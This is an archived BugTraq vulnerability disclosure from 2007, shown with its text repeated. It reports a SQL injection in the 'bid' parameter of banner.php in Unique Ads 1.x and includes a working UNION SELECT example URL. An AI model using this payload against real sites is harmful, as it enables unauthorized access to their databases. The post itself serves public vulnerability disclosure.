BugTraq
Back to list
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
SQL Injection in Unique Ads ( UDS )
Jan 21 2007 02:21AM
xx_hack_xx_2004 hotmail com
Hello
Vulnerable : uds
Version: 1.x
web : http://www.egyptechno.com
The bug :
http://example.com/uds/banner.php?bid=[SQL]
Example :
http://example.com/uds/banner.php?bid=-55%20union%20select%20null,null,n
ull%20from%20uds
,,,,,,,
Discoverey By : Linux_Drox
www.LeZr.com
Best Regards ,,
...
[ more ]
Privacy Statement
Copyright 2010, SecurityFocus
Vulnerable : uds
Version: 1.x
web : http://www.egyptechno.com
The bug :
http://example.com/uds/banner.php?bid=[SQL]
Example :
http://example.com/uds/banner.php?bid=-55%20union%20select%20null,null,n
ull%20from%20uds
,,,,,,,
Discoverey By : Linux_Drox
www.LeZr.com
Best Regards ,,
...
[ more ]